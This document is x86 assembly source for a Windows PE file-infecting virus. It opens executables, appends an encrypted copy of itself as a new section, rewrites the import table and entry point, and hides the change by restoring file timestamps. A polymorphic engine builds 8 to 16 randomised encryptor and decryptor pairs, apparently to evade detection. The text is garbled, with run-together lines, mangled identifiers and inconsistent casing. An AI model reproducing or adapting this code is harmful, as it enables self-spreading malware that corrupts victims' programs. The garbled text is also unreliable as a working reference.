Push 30h; Okonly ExclamationPush EBX
Push Offset Infnomenmsg
Push 0h
Call MessageBoxa; [!!! for debug !!!]
Push Memcommitsz / 4h
Call FreeStackMem
RET
Infect_d $: Push EBX
Push Edx
Push 21h; Okcancel Question
Push EBX
Push Edx
Push 0h
Call MessageBoxa; [!!! for debug !!!]
POP EDX
CMP EAX, 1H
POP EBX
JZ Infect_0 $
Push 30h; Okonly Exclamation
Push Ebx; Infecting Disabled
Push Offset Infcancelmsg; by Creator
Push 0h
Call Messageboxa
Push Memcommitsz / 4h
Call FreeStackMem
RET
Infect_0 $: Mov FileNamePtr, EDX; !!! Ready and Waiting !!!
Push Edx
Call getFileAttributesa; get file attributes
OR EAX, EAX
JZ Infect_f0 $
Mov FileAttributes, EAX
Push 80h; file_attribute_normal
Push DWORD PTR FileNamePtr
Call setFileAttributesa
Push 0h
PUSH 10000000H 80H; FAN, FFRA
Push 3h; OE
Push 0h
PUSH 1H; FSR
PUSH 80000000H 40000000H; GR / GW
Push DWORD PTR FileNamePtr
Call CreateFilea; Try to Open
CMP EAX, -1
JE Infect_f1 $
Mov FileHandle, EAX
Lea Eax, FileLastWrite; Storing File Date / Time
Push Eax; for Future Restoring
Lea Eax, FileLastAccess
Push EAX
Lea Eax, FileCreation
Push EAX
Push DWORD PTR FileHandle
Call getFiletime
Lea Eax, Ft_Struc; Checking Infection Flag
Push EAX
Lea Eax, FileLastWrite
Push EAX
Call filetimetosystemtime
MOV AX, FT_Year
ROL AX, 1
XOR AX, FT_MONTH
Ror Ax, 1
XOR AX, FT_DAY
ROL AX, 1
XOR AX, FT_HOUR
Ror Ax, 1
XOR AX, FT_MINUTE
ROL AX, 1
And Ax, 3ch
CMP AX, ft_second; already! Good.
JE Infect_f2 $
Mov Newseconds, AX
Push 0h
Lea Eax, Processedbytes; Read The Dos File
Push Eax; Header
Push 40h
Lea Eax, Dosheader
Push EAX
Push DWORD PTR FileHandle
Call readfile
OR EAX, EAX; Error Reading
JZ Infect_f2 $
CMP DWORD PTR ProcessedBytes, 40h
JNE INFECT_F2 $; Readed Less Ten 40h Bytescmp Word Ptr Dosheader, 'MZ'
JE Infect_f3 $
CMP Word PTR DOSHEADER, 'ZM'
JNE INFECT_F2 $
Infect_f3 $: CMP Word Ptr Dosheader [18h], 40h
JB Infect_f2 $
Push 0H; FileBegin
Push 0h
Push DWORD PTR DOSHEADER [3CH]
Push DWord PTR FileHandle; Seek to PE Header Start
Call setfilepointer
CMP EAX, -1
JE Infect_f2 $
Push 0h; read the peheader
Lea Eax, Processedbytes
Push EAX
Push Peheadersize
Lea Eax, Peheader
Push EAX
Push DWORD PTR FileHandle
Call readfile
OR EAX, EAX
JZ Infect_f2 $; Error READING
CMP DWORD PTR ProcessedBytes, Peheadersize
JNE INFECT_F2 $; Readed Too Less Bytes
CMP DWORD PTR PE_SIGN, 'EP'
JNE INFECT_F2 $
Movzx Eax, Word Ptr PE_NTHDRSIZE
Add Eax, DWORD PTR DOSHEADER [3CH]
Add Eax, 18h
Mov PefileHeaders, EAX
Push 0h; seek to seats descr.
Push 0h
Push EAX
Push DWORD PTR FileHandle
Call setfilepointer
Cmp Eax, -1; error seeking
JE Infect_f2 $
Movzx ECX, Word PTR PE_NUMOFSESECTIONS
OR ECX, ECX; No Sections
JZ Infect_f2 $
Mov Eax, SECTSIZE
Mul ECX
Add Eax, PefileHeaders
Add Eax, SECTSIZE
CMP Eax, PE_HEADERSIZE; no room for new section !?
Ja Infect_f2 $
Mov DWORD PTR IMPORTLAL, 0H
XOR EDX, EDX
Movzx ECX, Word PTR PE_NUMOFSESECTIONS
Infect_as $: Inc EDX
Push ECX
Push Edx
Push 0h; read the section header
Lea Eax, Processedbytes
Push EAX
Push subjectsize
Lea Eax, Section
Push EAX
Push DWORD PTR FileHandle
Call readfile
POP EDX
POP ECX
OR EAX, EAX; Error Reading
JZ Infect_f2 $
CMP DWORD PTR ProcessedBytes, SECTSIZE
JNE INFECT_F2 $; Readed Too Less Bytes
CMP DWORD PTR IMPORTLAL, 0H
JNE INFECT_NS $; Import Already Detected!
Mov Eax, SECTRVA
CMP EAX, PE_IMPORTTABLERVA
Ja Infect_ns $
Mov Importrva, EAX
Add Eax, Sectvirtsize
CMP EAX, PE_IMPORTTABLERVAJBE INFECT_NS $
Mov Eax, SECTPHYSOFFS
Mov Importphysoffs, EAX
Mov Eax, SECTFLAGS
Mov importflags, EAX
Mov Importorder, EDX
Mov DWORD PTR IMPORTLAL, -1
Infect_ns $: DEC ECX
JNZ Infect_as $
CMP DWORD PTR IMPORTLAL, 0H
JZ Infect_f2 $; import not found?!
MOV Eax, DWORD PTR SelfsectionName
Mov SelfsectName, Eax; Setup Self section Name
MOV Eax, DWORD PTR SelfsectionName 4
Mov SelfsectName 4, EAX
Mov Eax, SECTRVA
Add Eax, Sectvirtsize
MOV EBX, PE_ObjectAlign
Call AlignDwordondWord
Mov SelfseCtrva, Eax; Setup Self SECT. RVA & FLAGS
Mov DWORD PTR SelfsectFlags, 0e0000040H; R / W / E, Idata
Push 2h; seek to eof
Push 0h
Push 0h
Push DWORD PTR FileHandle
Call setfilepointer
CMP EAX, -1
JE Infect_f2 $
Push Eax; Setup Self Seption
MOV EBX, PE_FILALIGN; Physical Offset
Call AlignDwordondWord
Mov SelfsectPhysoffs, EAX
POP EBX
Sub Eax, EBX
JZ Infect_noprea $
Push Eax; Need File Alignment
MOV ECX, EAX
Lea EDI, Verylargebuffer
CLD
XOR Al, Al
Rep Stosb
POP ECX
Push ECX
Push 0h
Lea Eax, ProcessedBytes; Write Some Null's Into
Push Eax; Fucking File
Push ECX
Lea Eax, VeryLargebuffer
Push EAX
Push DWORD PTR FileHandle
Call writefile
OR EAX, EAX
POP ECX
JZ Infect_f2 $
CMP ECX, ProcessedBytes
JNE INFECT_F2 $
Infect_noprea $: xor EBX, EBX
Lea Edi, Verylargebuffer; Transfer Self to Memory
Mov ESI, Offset Start
Infect_Trans $: MOV Al, [ESI] [EBX]
MOV [EDI] [EBX], Al
Inc EBX
CMP EBX, StubimportPlace
JB infect_trans $
Mov Eax, 9h; Generate The Set of
Call Random; Polymorphic Cryptors
Add Eax, 8h; In Range (8..16)
Mov Cryptcnt, EAX
Lea Eax, VeryLargebuffer
Add Eax, StubimportPlace
Mov Edi, EAX
Mov Eax, fixupscounter; Depend on Pelink
SHL EAX, 2H; Tool Linking Strategy!
Add Eax, Fixupsplacemov Gencrsz, EAX
XOR EAX, EAX
Mov gensz, EAX
Mov Gentotalsz, EAX
Infect_gen $: Add Edi, 1000h; Maximal Encryptor Size!
Infect_gen_a $: Lea ESI, [EDI-1000H]
MOV ECX, Gencrsz
Push EDI
Push Eax; Make the Cryptor PAIRS
Call genpolymorph
POP EAX
POP EDI
CMP EBX, 1000H
Ja Infect_gen_a $
Mov Cryptors [EAX * 8], EBX; Encryptor Size
Mov Cryptors [EAX * 8 4], EDX; Decryptor Size
Add gensz, EDX
Add gencrsz, EDX
Add Gentotalsz, EDX
Add Gentotalsz, EBX
XCHG ESI, EDI
MOV ECX, EDX
CLD; Pack Cryptors
REP MOVSB
INC EAX
CMP EAX, CRYPTCNT
JB infect_gen $
Lea EDI, Verylargebuffer
Mov EBX, Here
Mov ESI, FIXUPSPLACE
MOV ECX, Fixupscounter; Undo fixups
Infect_undo1 $: MOV Eax, [ESI] [EBX]
SUB [EDI] [EAX], EBX
Add ESI, 4H
Dec ECX
JNZ Infect_undo1 $
Mov Eax, Gensz; Setup Polymorph Sizes
Mov Edx, Offset Polymorphsz
Sub EDX, EBX
MOV [EDI] [EDX], EAX
MOV EAX, PE_ENTRYPOINTRVA; Setup Entrypoint
Mov Edx, Offset StubenTrylabel
Sub EDX, EBX
MOV [EDI] [EDX], EAX
Mov Eax, SelfseCtrva; Setup SelfPlace
Mov Edx, Offset Currentplace
Sub EDX, EBX
MOV [EDI] [EDX], EAX
MOV EAX, PE_IMAGEBASE; Setup Imageplace
Mov Edx, Offset Imageplace
Sub EDX, EBX
MOV [EDI] [EDX], EAX
Mov Eax, 1H; Setup Initialization Flag
Mov Edx, Offset INITOK
Sub EDX, EBX
MOV [EDI] [EDX], EAX
MOV ESI, ImportPlace; Resetup Import Directory
MOV ECX, ImportLength
Infect_undo2 $: MOV EDX, [ESI] [EBX]; Get Lookup Pointer
Sub EDX, CURRENTPLACE
Sub EDX, POLYMORPHSZ
Push Edx
Infect_un_2 $: MOV Eax, [EDX] [EBX]; Resetup Lookup Table
OR EAX, EAX
JZ Infect_un_1 $
Sub Eax, CurrentPlace
Sub Eax, Polymorphsz
Add Eax, SelfseCtrva
Add Eax, Gensz
MOV [EDI] [EDX], EAX
Add Edx, 4H
JMP infect_un_2 $
Infect_un_1 $: POP EDX
Add Edx, SelfseCtrva; Resetup Lookup Ptr
Add Edx, Gensz
MOV [EDI] [ESI], EDXMOV EDX, [ESI] [EBX] 3 * 4; Resetup Name Ptr
Sub EDX, CURRENTPLACE
Sub EDX, POLYMORPHSZ
Add Edx, SelfseCtrva
Add Edx, Gensz
MOV [EDI] [ESI] 3 * 4, EDX
MOV EDX, [ESI] [EBX] 4 * 4; Resetup IMPRTADDRESS PTR
Sub EDX, CURRENTPLACE
Sub EDX, POLYMORPHSZ
Add Edx, SelfseCtrva
Add Edx, Gensz
MOV [EDI] [ESI] 4 * 4, EDX
Add ESI, 5 * 4
SUB ECX, 5 * 4
Ja Infect_undo2 $
Lea ESI, VeryLargebuffer; Crypt the Self Body
Mov ECX, StubimportPlace; Before Writing IT
Add Ecx, Gentotalsz; INTO DESIRED FILE
Add ESI, ECX
Mov EDI, ESI
Add Edi, Gensz
Dec Edi
Dec ESI
Std; Place Buffer AT
Rep Movsb; Program Start
Mov ESI, StubimportPlace
Add ESI, EDI
XOR EAX, EAX
Infect_crypt $: Push EAX
Mov ECX, Cryptors [EAX * 8 4]
Lea EBX, [ESI 1]
Add ESI, ECX
Add ESI, Cryptors [EAX * 8]
PUSH ESI
Push EDI
STD
REP MOVSB
Xchg EDI, [ESP]
Inc EDI
Push EBP
Push EDI
Call EBX; CRYPT by One Cryptor
POP EBP
POP EDI
POP ESI
POP EAX
INC EAX
CMP EAX, CRYPTCNT
JB Infect_crypt $
CLD
MOV ECX, StubimportPlace
Add ECX, GENSZ
Push ECX
Push 0H; Write Self Body
Lea Eax, ProcessedBytes; File Pointer
Push Eax; Must Be at File EOF
Push ECX
Lea Eax, VeryLargebuffer
Push EAX
Push DWORD PTR FileHandle
Call writefile
OR EAX, Eax; Error Writing
POP EAX
JZ Infect_f2 $
CMP EAX, Processedbytes
JNE INFECT_F2 $; TOO Less Bytes Written
MOV EAX, PE_IMPORTTABLERVA; Calculate Import Place
Sub eax, importrva; in file
Add Eax, Importphysoffs
Push 0h
Push 0h
Push EAX
Push DWORD PTR FILEHANDLE; and Seek in File At
Call setfilepointer; this position
CMP EAX, -1
JE Infect_f2 $; Error Seeking
Lea EBX, VeryLargebuffer
Infect_Trans1 $: Push EBX
Push 0h
Lea Eax, ProcessedBytes; Read The Next Import Record
Push EAX
PUSH 5 * 4
Push EBX
Push dword PTR FileHandleCall Readfile
POP EBX
OR EAX, EAX
JZ Infect_f2 $; Errors.
CMP DWORD PTR ProcessedBytes, 5 * 4
JNE INFECT_F2 $
Add Ebx, 5 * 4; Last Import Record???
CMP DWORD PTR [EBX] [3 * 4] [- 5 * 4], 0H
JNE INFECT_TRANS1 $
Lea Eax, VeryLargebuffer
SUB EBX, EAX
Push EBX
Push 2h; seek to eof
Push 0h
Push 0h
Push DWORD PTR FileHandle
Call setfilepointer
POP EBX
CMP EAX, -1; Errors.
JE Infect_f2 $
Push EBX
Push 0h; Write All Import Records
Lea Eax, ProcessedBytes; to Target File
Push EAX
Push EBX
Lea Eax, VeryLargebuffer
Push EAX
Push DWORD PTR FileHandle
Call writefile
POP EBX
OR EAX, EAX; Errors..
JZ Infect_f2 $
CMP ProcessedBytes, EBX
JNE INFECT_F2 $
Add Ebx, ImportLength; Calculate The New Import
MOV PE_IMPORTDATASZ, EBX; SIZE AND RVA
Mov Eax, SelfseCtrva
Add Eax, Gensz
Add Eax, Importplace
MOV PE_IMPORTTABLERVA, EAX
Lea Edi, Verylargebuffer; Generate Some Random Trash
Mov Eax, 100H
Call Random
Lea ECX, [EAX 10h]
Push ECX
CLD
Infect_trash $: MOV Eax, 100H
Call Random
Stosb
Dec ECX
JNZ Infect_Trash $
MOV ECX, [ESP]
Push 0h; and write it inTo
Lea Eax, ProcessedBytes; Fucking File, At Them
Push eax; end
Push ECX
Lea Eax, VeryLargebuffer
Push EAX
Push DWORD PTR FileHandle
Call writefile
OR EAX, EAX; Error Writing!
POP EAX
JZ Infect_f2 $
CMP Eax, ProcessedBytes; Too Less Bytes Written
JNE INFECT_F2 $
Push 2h; seek to eof
Push 0h
Push 0h
Push DWORD PTR FileHandle
Call setfilepointer
CMP EAX, -1; Seeking Failure
JE Infect_f2 $
Sub Eax, SelfsectPhysoffs; Setup SECTION SIZES
Mov SelfsectVirtsize, EAX
MOV EBX, PE_FILALIGN
Call AlignDwordondWord
Mov SelfsectPhysize, EAX
Sub eax, SelfsectVirtsize
JZ Infect_todone $; NEED File Align?
MOV ECX, EAX
Push ECX
MOV Al, 0H; Prepare Aligning BufferCld
Lea EDI, Verylargebuffer
Rep Stosb
POP ECX
Push ECX; and align the file
Push 0h
Lea Eax, Processedbytes
Push EAX
Push ECX
Lea Eax, VeryLargebuffer
Push EAX
Push DWORD PTR FileHandle
Call writefile
POP ECX
OR EAX, EAX; Error Writing!
JZ Infect_f2 $
CMP DWORD PTR ProcessedBytes, ECX
JNE INFECT_F2 $; TOO Less Bytes Written
Infect_todone $: MOV Eax, SelfsectVirtsize; Setup Memory Requirement
MOV EBX, PE_ObjectAlign
Call AlignDwordondWord
Add PE_IMAGESIZE, EAX
Add PE_SIZEOFIDATA, EAX
Mov Eax, SelfseCtrva; Setup Self Entrypoint
MOV PE_ENTRYPOINTRVA, EAX
MOV EAX, PE_STACKRESERVESZZ; Setup Stack Size
Add Eax, Memcommitsz; (For Placing Temporary)
MOV PE_STACKRESERVESZ, EAX; buffer
Movzx Eax, Word Ptr PE_NUMOFSECTIONS
Mov ECX, SECTSIZE
Mul ECX
Add Eax, PefileHeaders
Push 0h; prepare to write
Push 0H; Selfsection Descriptor
Push EAX
Push DWORD PTR FileHandle
Call setfilepointer
CMP EAX, -1; Errors.
JE Infect_f2 $
Push 0h; and write it!
Lea Eax, Processedbytes
Push EAX
Push SelfsectSize
Lea Eax, Selfsection
Push EAX
Push DWORD PTR FileHandle
Call writefile
OR EAX, EAX
JZ Infect_f2 $; Errors.
CMP DWORD PTR ProcessedBytes, SelfsectSize
JNE INFECT_F2 $
Mov ECX, DWORD PTR IMPORTORDER
Mov Eax, SECTSIZE; Prepare to Write Import
Mul Ecx; section Flags
Add Eax, PefileHeaders; Warning !!!
Sub Eax, 4H; Import Section Flags
Push 0h; is the last field in
Push 0H; section Header Structure
Push eax; !!!!!!!!!!!!!!!!!!!!!!!
Push DWORD PTR FileHandle
Call setfilepointer
CMP EAX, -1H; Seeking Failure
JE Infect_f2 $
OR DWORD PTR IMPORTFLAGS, 0C0000000H
Push 0h; enable reading
Lea Eax, Processedbytes; and Writing
Push Eax; In Import Section
Push 4h
Lea Eax, Importflagspush EAX
Push DWORD PTR FileHandle
Call writefile
OR EAX, EAX
JZ Infect_f2 $; Errors.
CMP DWORD PTR ProcessedBytes, 4H
JNE INFECT_F2 $
Inc Word Ptr PE_NUMOFSECTIONS; New # of Sections
Push 0h; prepare to Writing
Push 0h; pehader
Push DWORD PTR DOSHEADER [3CH]
Push DWORD PTR FileHandle
Call setfilepointer
CMP EAX, -1
JE Infect_f2 $
Push 0h
Lea Eax, Processedbytes
Push EAX
Push peheadersize; and write it
Lea Eax, Peheader
Push EAX
Push DWORD PTR FileHandle
Call writefile
OR EAX, EAX
JZ Infect_f2 $; Errors.
CMP DWORD PTR ProcessedBytes, Peheadersize
JNE INFECT_F2 $
MOV AX, NewSeconds; OK! Set Infection Flag.
MOV FT_SECOND, AX
Lea Eax, FileLastWrite
Push EAX
Lea Eax, ft_struc
Push EAX
Call SystemTimetOfiletime
Infect_f2 $: Lea Eax, FileLastWrite; Restore File Date / Time
Push EAX
Lea Eax, FileLastAccess
Push EAX
Lea Eax, FileCreation
Push EAX
Push DWORD PTR FileHandle
Call setFiletime
Push DWORD PTR FileHandle; Close Our File. Ooh, Yes!
Call Closehandle
Infect_f1 $: Push Dword PTR FileAttributes; Restore File Attributes
Push DWORD PTR FileNamePtr
Call setFileAttributesa
Infect_f0 $: Push Memcommitsz / 4h
Call FreeStackMem
RET
; ------------------------------------------------- ------------
Service routines
;
AllocStackMem: Pop Eax; Allocate Memory in Stack
POP ECX; Corrupt Eax, ECX !!!
Push EBP; Do Not Uses Call Stack
Allocstack_1 $: Push 0h; Before this Call
Dec ECX
JNZ Allocstack_1 $
MOV EBP, ESP
Push EAX
RET
FreeStackMem: Pop Eax; Free Memory In Stack
POP ECX; Corrupt Eax, ECX !!!
FreeStack_1 $: Pop DropdWord; Do Not Use Stack
Dec Ecx; Memory After this Call
JNZ FreeStack_1 $
POP EBP
Push EAX
RET
DROPDWORD DD?
AlignDWordondWord:
Push Edx
XOR EDX, EDX; Align Eax by EBX BoundaryPush EAX
Div EBX
POP EAX
OR EDX, EDX
JZ Aligndword_0 $
Sub Eax, EDX
Add Eax, EBX
AligndWord_0 $: POP EDX
RET
; ------------------------------------------------- ------------
; My string converter ;-)
Convertstr: CLD; Convert Some String
Call initconverter; in Edx with
MOV ESI, EDX; POSSIBLY Length in ECX
Lea EDI, Smallbuffer; (Corrupt EDI, ESI, EAX)
PUSH ESI
Push EDI
Push ECX
Push EBX
CMP ECX, -1H
JE Convert_MODE1 $
OR ECX, ECX
JZ Convert_DOONE $
Convert_MODE0 $: CALL ProcessChar; Counter Mode
Dec ECX
JNZ Convert_MODE0 $
POP EBX
POP ECX
POP EDX
POP ECX
MOV BYTE PTR ES: [EDI], 0H
Sub EDI, EDX
MOV ECX, EDI
RET
Convert_MODE1 $: CALL Processchar; Asciz Mode
CMP Byte PTR [ESI] [- 1], 0H
JNE Convert_MODE1 $
POP EBX
POP ECX
POP EDX
POP EAX
RET
Convert_DOONE $: POP EBX
POP ECX
POP EDI
POP ESI
MOV BYTE PTR ES: [EDI], 0H
RET
Processchar: Lodsb; Process One Char, EMPTY
Stosb; Strings Are Not ALLOWED !!!
CMP Al, 'A'
JB Process_1 $; Upcase The Source Char
CMP Al, 'Z'
Ja Process_1 $
SUB Al, 20h
Process_1 $: Push ECX
Push EBX
Push Edx
Mov ECX, ConvertDatalen
XOR EBX, EBX; Try The Some Variants
Process_again $: MOV EDX, [EBX * 4] Convertvar
MOV AH, [EDX]
Inc DWORD PTR [EBX * 4] Convertvar
CMP Al, AH; Good Char?
JNE Process_bad $
CMP BYTE PTR [EDX] [1], 0H; Last Char in Variant?
JNE Process_Next $
Sub EDX, [EBX * 8] [ConvertData]
SUB EDI, EDX; Make the Replacing
Dec Edi
PUSH ESI
MOV ESI, [EBX * 8 4] [ConvertData]
Process_do $: Lodsb; Transfer The Real String
Stosb; converted by me ;-)
CMP Al, 0H
JNE Process_do $
Dec Edi
POP ESI
Push DWORD PTR [EBX * 8] [ConvertData]
POP DWORD PTR [EBX * 4] Convertvar
JMP Process_ok $
Process_bad $: Push DWORD PTR [EBX * 8] [ConvertData] POP DWORD PTR [EBX * 4] Convertvar
Process_next $: inc Ebx; Next Variant
Dec ECX
JNZ Process_again $
Process_ok $: Pop Edx; Char Has Been Processed
POP EBX
POP ECX
RET
INITCONVERTER: PUSH EBX; Initconverter Routines
Push ECX
Mov ECX, ConvertDatalen
XOR EBX, EBX
INITCONV_1 $: Push DWORD PTR [EBX * 8] [ConvertData]
POP DWORD PTR [EBX * 4] Convertvar
Inc EBX
Dec ECX
JNZ INITCONV_1 $
POP ECX
POP EBX
RET
Transfer_str: CMP ECX, -1H; More Strict Strings
JE Transfer_s_m $; MOVING ROUTINE
OR ECX, ECX
JZ Transfer_s_d $
REP MOVSB
TRANSFER_S_D $: x Al, Al
Stosb
RET
TRANSFER_S_M $: LODSB
Stosb
OR Al, Al
JNZ Transfer_s_m $
RET
; ------------------------------------------------- ------------
The Polymorph Code Has The Such Structure:
Pusha
Call Start
; ...
; SEM: DD 1h
; ...
; Start: POP basereg
XOR SEMREG, SEMREG (AND semreg, 0) (Mov SemReg, 0)
Locksem: XCHG [Basereg] [SEM], SEMREG
OR SEMREG, SEMREG (TEST SEMREG, SEMREG) (AND semreg, semreg)
JZ LOCKSEM
; CMP SemReg, 2H
JE DONE
Add basereg, Codestart
Add [Basereg] [Border], Basereg
; .Loadregisters
Again: .decrypt
Add Base, 4H (Inc Base) 4 Times
; CMP Base, Border
JB Again
Sub Basereg, CodeStart Codesize
DONE: MOV [Basereg] [SEM], 2H
POPA
Codestart:
;
All code mixed with trash.. PREPARE to understand!
GENPOLYMORPH: Push ESI
Push EDI
Push ECX
Call getNoespreg; choose the 2 base
MOV PBASEREG, Al; Registers
MOV BL, Al; Base
GENPOLYM_R $: CALL GETNOESPREG
CMP BL, Al
JE GenPolym_R $
MOV Psemreg, Al; and Semaphore
Mov Byte Ptr PenableenCr, 0h
Mov ECX, 5H
Mov EBX, Offset GennoreGcom
Call Enumer
MOV Al, 60H; Pusha
Stosb
MOV AX, -1H
Mov EBX, Offset Genanycom
Call Enumer
MOV Al, 0e8h; Call $ ... Stosb
Mov Eax, 50h
Call Random
Add Eax, 10h
Push EAX
Stosd
MOV PBASE, EDI
MOV ECX, EAX
GENPOLYM_C $: MOV EAX, 100H
Call Random
Stosb
Dec ECX
JNZ GENPOLYM_C $
POP EAX
Sub Eax, 4h
Call Random
MOV PSEM, EAX
Add Eax, PBASE; Setup Semaphore
Mov DWORD PTR [EAX], 1H
MOV Al, PBASEREG; POP Basereg
OR Al, 58H
Stosb
MOV AH, -1H
MOV Al, PBASEREG
Mov ECX, 5H
Mov EBX, Offset Genanycom
Call Enumer
MOV Eax, 2H; XOR SEMREG, SEMREG
Call Random
OR Al, Al
JZ genpolym_x $
MOV Al, 2H
Call Random
OR Al, Al
JZ genpolym_xm $
MOV Al, 81H; (AND)
Stosb
MOV Al, Psemreg
OR Al, 0E0H
Stosb
XOR EAX, EAX
Stosd
JMP genpolym_xd $
GenPolym_xm $: MOV Al, 0B8H; (MOV)
OR Al, Psemreg
Stosb
XOR EAX, EAX
Stosd
JMP genpolym_xd $
GENPOLYM_X $: MOV Al, 2H; (XOR)
Call Random
Add Eax, EAX
OR Al, 31H
Stosb
MOV Al, Psemreg
SHL Al, 3H
OR Al, Psemreg
OR Al, 0C0H
Stosb
GenPolym_XD $: MOV Al, Psemreg
MOV AH, PBASEREG
Call Enumer
MOV PXCHG, EDI
MOV Al, 87H; Xchg Semreg, [BaseReg] [SEM]
Stosb
MOV Al, Psemreg
SHL Al, 3H
OR Al, 80h
OR Al, PBASEREG
Stosb
MOV EAX, PSEM
Stosd
MOV Al, PBASEREG
Mov Ah, Psemreg
Call Enumer
Mov Eax, 4h; Or Semreg, SemReg
Call Random
JZ genpolym_oc $
MOV Al, 3H; (AND) (TEST) (OR)
Call Random
SHL Al, 3H
MOV CL, Al
Mov Eax, 092185H
SHR EAX, CL
CMP AL, 85H
JE GenPolym_o $
Push EAX
Mov Eax, 2h
Call Random
OR Al, Al
POP EAX
JZ genpolym_o $
OR Al, 2H
GenPolym_o $: stosb
MOV Al, Psemreg
SHL Al, 3H
OR Al, Psemreg
OR Al, 0C0H
Stosb
JMP genpolym_od $
GENPOLYM_OC $: MOV Al, 83H; (CMP)
Stosb
MOV Al, Psemreg
OR Al, 38h
OR Al, 0C0H
Stosb
XOR Al, Al
Stosb
GENPOLYM_OD $: MOV ECX, 5H
Mov EBX, Offset Gennoflagcom
Call Enumer
MOV AX, 840FH; JZ LOCKSEM
Stosw
Mov Eax, PXCHG
Sub Eax, 4h
Sub Eax, EDI
Stosd
MOV Al, PBaseRegmov Ah, Psemreg
Mov EBX, Offset Genanycom
Call Enumer
MOV Al, 83H; CMP SEMREG, 2H
Stosb
MOV Al, Psemreg
OR Al, 0F8H
Stosb
MOV Al, 2H
Stosb
Mov EBX, Offset Gennoflagcom
Call Enumer
MOV AX, 840FH; JZ DONE
Stosw
MOV PMOV, EDI
Stosd
MOV Al, PBASEREG
MOV AH, -1H
Mov EBX, Offset Genanycom
Call Enumer
MOV Al, 81H; Add Basereg, Codestart
Stosb
MOV Al, PBASEREG
OR Al, 0C0H
Stosb
MOV PBaseAdd, EDI
Stosd
MOV Al, PBASEREG
MOV AH, -1H
Call Enumer
MOV Al, 1H; Add [Basereg] [BRDR], BASEREG
Stosb
MOV Al, PBASEREG
SHL Al, 3H
OR Al, 80h
OR Al, PBASEREG
Stosb
Mov Padd, EDI
Stosd
MOV Al, PBASEREG
MOV AH, -1H
Call Enumer
Mov Byte Ptr PenableEncr, 1h
MOV Al, PBaseReg; Encryptor, POP Basereg
OR Al, 58H
Call Storebyte
MOV Al, 87h; Encryptor,
Call StorebyTe; Xchg Basereg, [ESP]
MOV Al, PBASEREG
SHL Al, 3H
OR Al, 4H
Call Storebyte
MOV Al, 24h
Call Storebyte
MOV Al, 68H; Encryptor, Push Encrsize
Call Storebyte
MOV EAX, [ESP]
Sub Eax, 4h
Call StoredWord
Mov EDX, 1H; .loadRegisters
MOV CL, PBASEREG
SHL EDX, CL
OR EDX, 10H
MOV Al, PBASEREG
MOV AH, -1H
GENPOLYM_L $: Push EAX
Call genmovcom
Mov Eax, 2h
Call Random
OR Al, Al
POP EAX
JZ genpolym_l1 $
Push EAX
Call gennoregcom
POP EAX
GENPOLYM_L1 $: CMP EDX, 0FFH
JNE GENPOLYM_L $
Mov ECX, 5H
Mov EBX, Offset GennoreGcom
Call Enumer
MOV Al, 1H; Encryptor, Border Setup
Call StorebyTe; Add [ESP], Basereg
MOV Al, PBASEREG
SHL Al, 3H
OR Al, 4H
Call Storebyte
MOV Al, 24h
Call Storebyte
Mov Pagain, EDI
Mov Pagain_e, ESI
MOV EAX, 40H; 10H..50h Commands
Call Random
Add Eax, 10h
MOV ECX, EAX
GENPOLYM_G0 $: MOV EAX, 3H ;. Decrypt
Call Random
OR Al, Al
MOV Al, PBASEREG
MOV AH, -1H
JNZ GENPOLYM_G1 $
Call gnarcom
JMP genpolym_g2 $
GENPOLYM_G1 $: Call Genarmemcom
GenPolym_G2 $: dec ECXJNZ GENPOLYM_G0 $
Mov Eax, 2H; Add Basereg, 4H
Call Random
OR Al, Al
JZ genpolym_i2 $
MOV Al, PBASEREG; (Inc)
OR Al, 40h
Mov ECX, 4H
GenPolym_i1 $: Stosb
Call Storebyte
Push EAX
Call gennoregcom
POP EAX
Dec ECX
JNZ genpolym_i1 $
JMP genpolym_i3 $
GENPOLYM_I2 $: MOV Al, 83H; (Add)
Stosb
Call Storebyte
MOV Al, PBASEREG
OR Al, 0C0H
Stosb
Call Storebyte
MOV Al, 4H
Stosb
Call Storebyte
GenPolym_i3 $: MOV ECX, 5H
Mov EBX, Offset Genarcom
MOV Al, PBASEREG
MOV AH, -1H
Call Enumer
MOV Al, 81H; CMP BaseREG, LIMIT
Stosb
MOV Al, PBASEREG
OR Al, 0F8H
Stosb
Mov Eax, EDI
Sub Eax, PBase
MOV EBX, PADD
MOV [EBX], EAX; 1Pass Complete Add Command
MOV EAX, [ESP]
Sub Eax, 4h
Stosd
Mov Al, 3bh; Encryptor, Border Check
Call StorebyTe; CMP Basereg, [ESP]
MOV Al, PBASEREG
SHL Al, 3H
OR Al, 4H
Call Storebyte
MOV Al, 24h
Call Storebyte
Mov EBX, Offset Gennoflagcom
Call Enumer
MOV AX, 820FH
Stosw
Call Storeword
Mov Eax, Pagain; Complete JMP Again Commands
Sub Eax, EDI
Sub Eax, 4h
Stosd
Mov Eax, Pagain_e
Sub Eax, ESI
Sub Eax, 4h
Call StoredWord
MOV Al, 58H; Complete Encryptor
Call Storebyte
MOV Al, 0C3H
Call Storebyte
Mov Byte Ptr PenableenCr, 0h
Mov EBX, Offset Genanycom
MOV Al, PBASEREG
MOV AH, -1H
Call Enumer
MOV Al, 81H; Sub Basereg, Codesize
Stosb
MOV Al, PBASEREG
OR Al, 0e8h
Stosb
MOV PBASESUB, EDI
Stosd
MOV Al, PBASEREG
MOV AH, -1H
Call Enumer
MOV Al, 0C7H; MOV [basereg] [SEM], 2H
Stosb
MOV Al, PBASEREG
OR Al, 80h
Stosb
MOV EAX, PSEM
Stosd
Mov Eax, 2h
Stosd
MOV EAX, EDI; Complete Jmp Done Command
Sub Eax, PMOV
Sub Eax, 4h
MOV EBX, PMOV
MOV [EBX], EAX
Mov EBX, Offset Genanycom
MOV AX, -1H
Call Enumer
MOV Al, 61H; POPA
Stosb
Mov EBX, Offset GennoreGcom
Call Enumer
Mov Eax, EDI; Complete Base to Body Setupsub Eax, PBase
MOV EBX, PBaseAdd
MOV [EBX], EAX
MOV EBX, PADD; 2Pass Complete Add Command
SUB [EBX], EAX
MOV EBX, [ESP]; Backward Body To Base Setup
Dec EBX
And BL, 0fch; Rounded by 4h
Add Eax, EBX
MOV EBX, PBaseSub
MOV [EBX], EAX
POP ECX
Mov EDX, EDI; All Done SuccessFully!
Sub EDX, [ESP]; EDX - Decryptor Size
MOV EBX, ESI
Sub EBX, [ESP] [4]; EBX - Encryptor Size
Add ESP, 8h
RET
; ------------------------------------------------- ------------
GenarmemCom: Push Eax; Some Command That
Mov Eax, 2h; Change Memory by
Call Random; Base in Eax (AL)
OR Al, Al
JZ Genarmem_imm $
MOV Al, 2H; Add; Sub (REG)
Call Random
OR Al, Al
